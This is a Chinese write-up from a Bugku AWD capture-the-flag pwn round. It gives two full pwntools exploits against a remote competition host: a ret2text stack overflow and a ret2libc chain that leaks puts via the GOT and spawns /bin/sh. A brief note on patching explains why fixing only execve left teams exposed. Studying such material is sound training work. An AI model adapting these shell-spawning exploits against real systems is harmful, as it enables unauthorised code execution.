Bugku S3 AWD排位赛-5 pwn
栈溢出,直接ret2text
from pwn import *

# 64-bit Linux target; 'debug' log level echoes every byte sent and received.
context(arch='amd64', os='linux', log_level='debug')
file_name = './pwn'


def li(x):
    """Print *x* in orange (informational status line)."""
    print('\x1b[01;38;5;214m' + x + '\x1b[0m')


def ll(x):
    """Print *x* in red (important status line)."""
    print('\x1b[01;38;5;1m' + x + '\x1b[0m')


context.terminal = ['tmux', 'splitw', '-h']

# NOTE: despite the name, debug=1 selects the *remote* AWD box; 0 runs ./pwn locally.
debug = 1
r = remote('192-168-1-26.awd.bugku.cn', 9999) if debug else process(file_name)
elf = ELF(file_name)
def dbg():
    """Attach gdb to the current target `r` (only useful for a local process)."""
    target = r
    gdb.attach(target)
# ret2text: the binary is not PIE, so this in-binary address is fixed (the writeup
# identifies it as the execve("/bin/sh") code the author later patched out).
shell = 0x4006CE

# Root cause (see writeup): an unbounded gets() into a stack buffer. 0x30 bytes reach
# the saved rbp, 8 more reach the return address. Bounding the read (fgets with the
# buffer size) closes this and the ret2libc variant alike; patching execve alone does not.
padding = b'a' * (0x30 + 8)
p1 = padding + p64(shell)
r.sendlineafter('Please tell me your name: ', p1)
r.interactive()
修漏洞这里笔者直接把 execve("/bin/sh", 0LL, 0LL); 改成了 execve(0, 0LL, 0LL);,但转念一想,gets 这个漏洞大部分人都不会修,所以笔者就直接写了第二份 exp,也就是 ret2libc。
from pwn import *

# 64-bit Linux target; 'debug' log level echoes every byte sent and received.
context(arch='amd64', os='linux', log_level='debug')
file_name = './pwn'


def li(x):
    """Print *x* in orange (informational status line)."""
    print('\x1b[01;38;5;214m' + x + '\x1b[0m')


def ll(x):
    """Print *x* in red (important status line)."""
    print('\x1b[01;38;5;1m' + x + '\x1b[0m')


context.terminal = ['tmux', 'splitw', '-h']

# NOTE: despite the name, debug=1 selects the *remote* AWD box; 0 runs ./pwn locally.
debug = 1
r = remote('192-168-1-26.awd.bugku.cn', 9999) if debug else process(file_name)
elf = ELF(file_name)
def dbg():
    """Attach gdb to the current target `r` (only useful for a local process)."""
    target = r
    gdb.attach(target)
# Disabled ret2text variant from the first exploit, kept for reference only:
# shell = 0x4006CE
# p1 = b'a' * (0x30 + 8) + p64(shell)
# r.sendlineafter('Please tell me your name: ', p1)

# Root cause (see writeup): an unbounded gets() into a stack buffer; 0x30 bytes reach
# the saved rbp and 8 more reach the return address. Teams that only patched execve
# left this open, which is why a ret2libc chain still works against them.
padding = b'a' * (0x30 + 8)

# --- Stage 1: leak the runtime address of puts through the GOT -----------------
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main_addr = elf.sym['main']
pop_rdi_ret = 0x00000000004007b3   # `pop rdi ; ret` gadget in the non-PIE binary

# puts(puts@got) prints the resolved libc pointer, then main() runs again for stage 2.
p1 = b''.join([padding, p64(pop_rdi_ret), p64(puts_got), p64(puts_plt), p64(main_addr)])
r.sendlineafter('Please tell me your name: ', p1)

# The leak is read up to the 0x7f byte (presumably the top byte of a userspace libc
# address); keep the 6 meaningful bytes and zero-extend to a u64.
leaked = r.recvuntil('\x7f')[-6:]
puts_addr = u64(leaked.ljust(8, b'\x00'))
li(f'puts_addr = {puts_addr:#x}')

# --- Stage 2: system("/bin/sh") relative to the leaked libc base --------------
# This libc must be the same build as the remote one, otherwise every offset below is wrong.
libc = ELF('../ppp/libc.so.6')
libc_base = puts_addr - libc.sym['puts']
bin_sh = libc_base + next(libc.search(b'/bin/sh'))
system_addr = libc_base + libc.sym['system']
ret = 0x000000000040053e   # lone `ret`, presumably to realign the stack before system()
p2 = b''.join([padding, p64(ret), p64(pop_rdi_ret), p64(bin_sh), p64(system_addr)])
r.sendlineafter('Please tell me your name: ', p2)
r.interactive()
结果不出所料,有些队只会修 execve,但是不会修 gets,所以成功打到了全场。